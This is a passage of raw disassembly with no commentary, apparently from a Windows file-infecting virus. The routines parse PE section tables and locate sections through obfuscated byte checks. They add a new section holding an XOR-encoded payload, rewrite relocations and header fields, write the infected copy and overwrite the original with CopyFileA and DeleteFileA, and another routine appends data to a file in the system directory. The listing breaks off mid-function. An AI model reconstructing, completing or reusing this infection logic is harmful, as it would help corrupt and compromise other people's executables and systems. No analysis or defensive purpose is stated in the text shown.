mov edx, [ebp+var_31F1C]
add eax, edx
mov edx, [ebp+var_31F08]
add eax, edx
mov edx, [ebp+var_31F04]
cmp [edx+54h], eax
jbe loc_44309D
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F28], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F2C], eax
mov eax, [ebp+var_31F28]
mov edx, [ebp+var_31F2C]
add eax, edx
mov [ebp+var_31F20], eax
mov [ebp+var_31F30], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
mov edi, dword_44B10C
dec edi
sub ecx, edi
mul ecx
mov [ebp+var_31F34], eax
mov eax, [ebp+var_31F30]
mov edx, [ebp+var_31F34]
add eax, edx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F20]
add edx, eax
push edx
mov edx, [ebp+var_31F24]
add edx, eax
push edx
call ds:dword_449634
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F38], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
movsx edi, word_44B090
add edi, dword_44B128
sub ecx, edi
mul ecx
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_31F38]
mov edx, eax
mov ecx, [ebp+var_31F3C]
add [edx], ecx
loc_44309D: ; CODE XREF: sub_442961+5CA�j
; sub_442961+5E5�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43B43E
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F20]
mov esi, edx
add esi, eax
push offset byte_44B701
call sub_43DF30
push eax
push esi
call ds:dword_4471F4
mov eax, dword_44B098
add eax, 1FFFBh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_43B43E
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
movsx eax, word_44B140
lea eax, [eax+eax-3FFFFFCEh]
mov [esi+24h], eax
movsx eax, word_44B14C
add eax, 8
push eax
mov eax, dword_44B148
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_449640
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_43B43E
add esp, 30h
mov [ebp+var_10], eax
mov eax, dword_44B10C
add eax, 1FFF8h
movsx edx, word_44B0F0
add eax, edx
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call ds:dword_44ABAC
movsx edi, word_44B14C
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
movsx eax, word_44B0E4
add eax, dword_44B094
sub eax, 6
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
mov edi, dword_44B0BC
movsx edx, word_44B118
add edi, edx
sub edi, 9
mov edx, [ebp+var_42C]
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call ds:dword_44ABAC
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F28], edx
mov [ebp+var_31F24], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F28]
mov [ecx+edi], dl
call ds:dword_44ABAC
movsx edx, word_44B0B8
dec edx
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F30], edx
mov [ebp+var_31F2C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F30]
mov [ecx+edi], dl
mov eax, dword_44B10C
add eax, 3Dh
add eax, dword_44B0D4
mov [ebp+var_43C], eax
jmp short loc_4432AE
; ---------------------------------------------------------------------------
loc_443279: ; CODE XREF: sub_442961+959�j
call ds:dword_44ABAC
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F38], edx
mov [ebp+var_31F34], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F38]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_4432AE: ; CODE XREF: sub_442961+916�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_443279
push 0Dh
push offset dword_44B180
lea eax, [ebp+var_31ED0]
push eax
call ds:dword_449634
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED0]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_449634
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
mov edx, dword_44B144
add edx, 2
add eax, edx
mov [ebp+var_424], eax
jmp short loc_443327
; ---------------------------------------------------------------------------
loc_44330D: ; CODE XREF: sub_442961+9D5�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_443327: ; CODE XREF: sub_442961+9AA�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_44330D
movsx eax, word_44B12C
sub eax, 4
mov [ebp+var_18], eax
movsx eax, word_44B0CC
add eax, dword_44B0BC
sub eax, 8
mov [ebp+var_440], eax
jmp loc_4435B1
; ---------------------------------------------------------------------------
loc_443360: ; CODE XREF: sub_442961+C60�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F40]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov esi, edx
add esi, eax
movsx eax, word_44B120
sub eax, 8
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_443407
movsx eax, word_44B0F0
movsx edx, word_44B090
add eax, edx
sub eax, 6
cmp byte ptr [ebx+eax], 72h
jnz short loc_443407
mov eax, dword_44B0DC
add eax, dword_44B0F8
sub eax, 0Ah
cmp byte ptr [ebx+eax], 63h
jnz short loc_443407
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_4435AB
; ---------------------------------------------------------------------------
loc_443407: ; CODE XREF: sub_442961+A69�j
; sub_442961+A82�j ...
mov eax, dword_44B0D8
mov edx, eax
add edx, dword_44B0FC
sub edx, 6
cmp byte ptr [ebx+edx], 2Eh
jnz short loc_443453
movsx edx, word_44B0B8
add eax, edx
sub eax, 4
cmp byte ptr [ebx+eax], 65h
jnz short loc_443453
movsx eax, word_44B0A4
cmp byte ptr [ebx+eax], 61h
jnz short loc_443453
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1180], eax
jmp loc_4435AB
; ---------------------------------------------------------------------------
loc_443453: ; CODE XREF: sub_442961+ABA�j
; sub_442961+ACC�j ...
movsx eax, word_44B0B4
add eax, dword_44B0D0
sub eax, 5
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_443492
mov eax, dword_44B104
movsx edx, word_44B130
add eax, edx
sub eax, 5
cmp byte ptr [ebx+eax], 69h
jnz short loc_443492
mov eax, dword_44B09C
add eax, 2
cmp byte ptr [ebx+eax], 61h
jz loc_4435AB
loc_443492: ; CODE XREF: sub_442961+B06�j
; sub_442961+B1D�j
push ebx
push esi
call ds:dword_4471F4
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, dword_44B0B0
add eax, 7
push eax
movsx eax, word_44B114
sub eax, 3
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_449640
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43B43E
add esp, 1Ch
mov [ebp+var_10], eax
movsx eax, word_44B14C
add eax, dword_44B104
sub eax, 5
cmp byte ptr [ebx+eax], 64h
jnz short loc_44355F
mov eax, [ebp+var_31F3C]
cmp [ebp+var_10], eax
jbe short loc_44355F
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F48], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_44355F: ; CODE XREF: sub_442961+BDC�j
; sub_442961+BE7�j
mov eax, dword_44B0A8
add eax, 0FFCh
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_43B43E
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_449634
add esp, 14h
loc_4435AB: ; CODE XREF: sub_442961+AA1�j
; sub_442961+AED�j ...
inc [ebp+var_440]
loc_4435B1: ; CODE XREF: sub_442961+9FA�j
mov eax, [ebp+var_844]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_443360
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_4435D6: ; CODE XREF: sub_442961+EA7�j
movsx eax, word_44B114
add eax, dword_44B098
sub eax, 8
mov [ebp+var_1C], eax
jmp short loc_443647
; ---------------------------------------------------------------------------
loc_4435EB: ; CODE XREF: sub_442961+CEC�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_443607
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_443607: ; CODE XREF: sub_442961+C99�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_443644
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_44364F
; ---------------------------------------------------------------------------
loc_443644: ; CODE XREF: sub_442961+CBF�j
inc [ebp+var_1C]
loc_443647: ; CODE XREF: sub_442961+C88�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_4435EB
loc_44364F: ; CODE XREF: sub_442961+CE1�j
mov eax, dword_44B110
movsx edx, word_44B0F4
add eax, edx
sub eax, 8
mov [ebp+var_428], eax
jmp loc_4437CE
; ---------------------------------------------------------------------------
loc_44366B: ; CODE XREF: sub_442961+E79�j
mov eax, [ebp+var_428]
movsx edx, word_44B130
add edx, dword_44B0F8
sub edx, 3
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F40], eax
mov ax, [eax]
mov word ptr [ebp+var_31F3C], ax
movzx eax, word ptr [ebp+var_31F3C]
mov edx, dword_44B0C4
sub edx, 4
cmp eax, edx
jz loc_4437E0
movzx edi, word ptr [ebp+var_31F3C]
movsx edx, word_44B0CC
mov ecx, edx
add ecx, 5
sar edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx edi, word ptr [ebp+var_31F3C]
mov ecx, dword_44B100
inc ecx
shl edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx edi, word ptr [ebp+var_31F3C+2]
movsx edx, word_44B114
mov ecx, edx
inc ecx
sar edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx eax, word ptr [ebp+var_31F3C+2]
mov edx, dword_44B10C
add edx, dword_44B138
sub edx, 5
cmp eax, edx
jnz short loc_44372B
movsx eax, word_44B0B8
sub eax, 2
cmp [ebp+var_428], eax
jnz loc_4437E0
loc_44372B: ; CODE XREF: sub_442961+DB2�j
mov eax, [ebp+var_844]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F4C], eax
sub eax, [ebp+var_31F48]
mov [ebp+var_31F50], eax
movzx eax, word ptr [ebp+var_31F44+2]
movsx edx, word_44B0B4
sub edx, 2
cmp eax, edx
jnz short loc_4437BA
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F54], eax
mov edx, [ebp+var_31F50]
add [eax], edx
loc_4437BA: ; CODE XREF: sub_442961+E2C�j
mov eax, dword_44B098
add eax, dword_44B128
sub eax, 3
add [ebp+var_428], eax
loc_4437CE: ; CODE XREF: sub_442961+D05�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_44366B
loc_4437E0: ; CODE XREF: sub_442961+D47�j
; sub_442961+DC4�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_844]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_4435D6
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1184], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
add eax, 60h
mov edx, [ebp+var_844]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_844]
mov edx, [edx+68h]
add [eax], edx
mov eax, [ebp+var_8]
mov edx, dword_44B098
add edx, 8
mov [eax+44h], dx
mov edx, dword_44B104
add edx, 6
mov [eax+1Ah], dl
movsx edx, word_44B0CC
sub edx, 6
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EDC], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EDC]
add eax, [edx+1Ch]
sub eax, [ebp+var_1180]
mov [ebp+var_31EE0], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE4], eax
mov eax, [eax]
mov [ebp+var_1058], eax
mov eax, dword_44B0E8
sub eax, 6
mov [ebp+var_24], eax
jmp short loc_4438FB
; ---------------------------------------------------------------------------
loc_4438BA: ; CODE XREF: sub_442961+FA0�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_4438F8
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_1188], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1190], edi
jmp short loc_443903
; ---------------------------------------------------------------------------
loc_4438F8: ; CODE XREF: sub_442961+F73�j
inc [ebp+var_24]
loc_4438FB: ; CODE XREF: sub_442961+F57�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_4438BA
loc_443903: ; CODE XREF: sub_442961+F95�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1190]
add eax, [ebp+var_1058]
sub eax, [ebp+var_1188]
mov [ebp+var_118C], eax
mov eax, [ebp+var_844]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_443C30
; ---------------------------------------------------------------------------
loc_443944: ; CODE XREF: sub_442961+12DB�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F3C], edx
movsx ecx, word_44B0E4
mov [ebp+var_31F44], ecx
movzx edi, byte ptr [edx+eax]
mov edx, dword_44B104
add edx, 0E1h
add edx, ecx
cmp edi, edx
jnz loc_443AC8
mov edx, dword_44B124
mov [ebp+var_31F40], edx
movsx edi, word_44B11C
add edi, edx
sub edi, 3
mov edx, eax
add edx, edi
mov edi, [ebp+var_31F3C]
movzx edx, byte ptr [edi+edx]
movsx edi, word_44B13C
movsx ecx, word_44B118
add edi, ecx
mov ecx, edi
sub ecx, 10h
cmp edx, ecx
jnz loc_443AC8
mov edx, dword_44B094
add edx, dword_44B0C0
dec edx
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word_44B0E0
movsx edi, word_44B090
add ecx, edi
sub ecx, 0Ah
cmp edx, ecx
jnz loc_443AC8
mov edx, [ebp+var_31F40]
mov ecx, [ebp+var_31F44]
add edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+ecx]
mov ecx, dword_44B0AC
sub ecx, 2
cmp edx, ecx
jnz loc_443AC8
mov edx, dword_44B110
sub edx, 4
add eax, edx
mov edx, [ebp+var_31F3C]
movzx eax, byte ptr [edx+eax]
cmp eax, dword_44B128
jnz loc_443AC8
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1184]
mov [ebp+var_31F4C], eax
movsx eax, word_44B11C
movsx edx, word_44B14C
lea eax, [eax+edx-7]
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
mov edx, dword_44B0EC
movsx ecx, word_44B0F0
add edx, ecx
dec edx
sub eax, edx
mov [ebp+var_31F50], eax
mov edi, dword_44B0EC
mov edx, [ebp+var_C]
mov ecx, dword_44B10C
add ecx, dword_44B134
sub ecx, 6
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4], ecx
loc_443AC8: ; CODE XREF: sub_442961+1010�j
; sub_442961+1053�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F48], edx
movzx ecx, byte ptr [edx+eax]
mov edi, dword_44B148
add edi, 0E6h
add edi, dword_44B128
cmp ecx, edi
jnz loc_443C2D
movsx ecx, word_44B120
mov [ebp+var_31F4C], ecx
movsx edi, word_44B0E0
mov edx, ecx
add edx, edi
sub edx, 0Fh
mov edi, eax
add edi, edx
mov edx, [ebp+var_31F48]
movzx edx, byte ptr [edx+edi]
movsx edi, word_44B0CC
add edi, dword_44B104
sub edi, 9
cmp edx, edi
jnz loc_443C2D
mov edx, dword_44B0C8
mov edi, edx
add edi, dword_44B0B0
sub edi, 7
mov ecx, eax
add ecx, edi
mov edi, [ebp+var_31F48]
movzx ecx, byte ptr [edi+ecx]
movsx edi, word_44B13C
add edi, dword_44B0EC
sub edi, 7
cmp ecx, edi
jnz loc_443C2D
mov ecx, dword_44B134
add ecx, edx
mov edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F48]
movzx edx, byte ptr [edx+ecx]
mov ecx, dword_44B0FC
add ecx, dword_44B0D4
sub ecx, 3
cmp edx, ecx
jnz loc_443C2D
mov edx, [ebp+var_31F4C]
sub edx, 4
add eax, edx
mov edx, [ebp+var_31F48]
movzx eax, byte ptr [edx+eax]
mov edx, dword_44B0A8
sub edx, 4
cmp eax, edx
jnz short loc_443C2D
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F50], eax
mov eax, [ebp+var_118C]
mov [ebp+var_31F54], eax
mov eax, dword_44B144
add eax, 0FFFFFFFFh
sub eax, [ebp+var_31F50]
add eax, [ebp+var_31F54]
mov edx, dword_44B0C4
add edx, dword_44B094
sub eax, edx
mov [ebp+var_31F58], eax
movsx edi, word_44B0B4
mov edx, [ebp+var_C]
mov ecx, dword_44B0F8
sub ecx, 6
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-14h], ecx
loc_443C2D: ; CODE XREF: sub_442961+118B�j
; sub_442961+11CC�j ...
inc [ebp+var_C]
loc_443C30: ; CODE XREF: sub_442961+FDE�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_443944
push [ebp+var_1070]
call ds:dword_449650 ; CloseHandle
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_4471F4
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_443C6A: ; CODE XREF: sub_442961+130E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443C6A
mov [ebp+var_31ED4], eax
movsx edx, word_44B114
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED4]
mov edx, dword_44B0D4
add edx, 2
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED4]
mov edx, dword_44B100
sub edx, 2
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, dword_44B138
movsx edx, word_44B0F0
add eax, edx
sub eax, 7
push eax
push 2
push 0
mov eax, dword_44B0C0
sub eax, 3
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_44AB8C ; WriteFile
push [ebp+var_1070]
call ds:dword_449650 ; CloseHandle
push [ebp+var_4]
call ds:dword_447618 ; LocalFree
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_448364 ; CopyFileA
lea eax, [ebp+var_116F]
push eax
call ds:dword_445008 ; DeleteFileA
mov eax, 1
jmp short loc_443D60
; ---------------------------------------------------------------------------
loc_443D49: ; CODE XREF: sub_442961+BD�j
; sub_442961+D7�j ...
push [ebp+var_1070]
call ds:dword_449650 ; CloseHandle
push [ebp+var_4]
call ds:dword_447618 ; LocalFree
xor eax, eax
loc_443D60: ; CODE XREF: sub_442961+59�j
; sub_442961+13E6�j
pop edi
pop esi
pop ebx
leave
retn
sub_442961 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443D65 proc near ; CODE XREF: sub_43BAE4+3E4�p
; sub_43D2F7+140�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, dword_44B0C4
sub esi, 4
jmp short loc_443DA5
; ---------------------------------------------------------------------------
loc_443D79: ; CODE XREF: sub_443D65+43�j
call ds:dword_44ABAC
mov edi, dword_44B124
add edi, 5Fh
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_443DA5: ; CODE XREF: sub_443D65+12�j
cmp esi, [ebp+arg_4]
jl short loc_443D79
mov eax, [ebp+arg_4]
movsx edx, word_44B120
sub edx, 8
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_443D65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443DC1 proc near ; CODE XREF: sub_43BAE4+334�p
; sub_43BAE4+3C7�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_444148
push offset dword_44B6FC
call sub_43DF30
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset dword_44B6F4
call sub_43DF30
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
push 0
push 80h
push 4
push 0
mov eax, dword_44B0FC
movsx edx, word_44B12C
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44AB9C ; SetFilePointer
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_443E79: ; CODE XREF: sub_443DC1+BD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443E79
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call ds:dword_44AB8C ; WriteFile
push edi
call ds:dword_449650 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_443DC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443EA2 proc near ; CODE XREF: sub_43FA07+248�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_44118A
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_4440C8
mov [ebp+var_18], 8
push offset dword_44B6E4
call sub_442838
pop ecx
push eax
call ds:dword_445044
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word_44B108
add eax, dword_44B0AC
sub eax, 7
cmp ebx, eax
jnz loc_4440B2
lea eax, [ebp+var_3C]
push eax
push offset dword_44C8A0
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B0E0
add eax, dword_44B0FC
sub eax, 0Bh
cmp ebx, eax
jnz loc_4440A9
mov [ebp+var_30], 2
mov eax, dword_44B09C
sub eax, 3
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
cmp ebx, dword_44B128
jnz loc_4440A0
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset dword_44C890
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B0D4
add eax, dword_44B10C
sub eax, 3
cmp ebx, eax
jnz loc_444097
inc ds:dword_44761C
movsx eax, word_44B0B4
add eax, 5
cmp ds:dword_44761C, eax
jb short loc_443FF9
mov eax, dword_44B09C
movsx edx, word_44B140
add eax, edx
mov ds:dword_44761C, eax
push [ebp+var_4]
call sub_43F7D6
pop ecx
jmp loc_44408E
; ---------------------------------------------------------------------------
loc_443FF9: ; CODE XREF: sub_443EA2+134�j
movsx eax, word_44B120
sub eax, 8
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push ds:dword_44963C
call sub_43DC1A
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push ds:dword_445018
call sub_43DC1A
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_44404E
cmp [ebp+var_34], 0
jz short loc_44404E
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_43D2F7
add esp, 10h
loc_44404E: ; CODE XREF: sub_443EA2+18F�j
; sub_443EA2+195�j
cmp [ebp+var_40], 0
jz short loc_44406F
cmp [ebp+var_38], 0
jz short loc_44406F
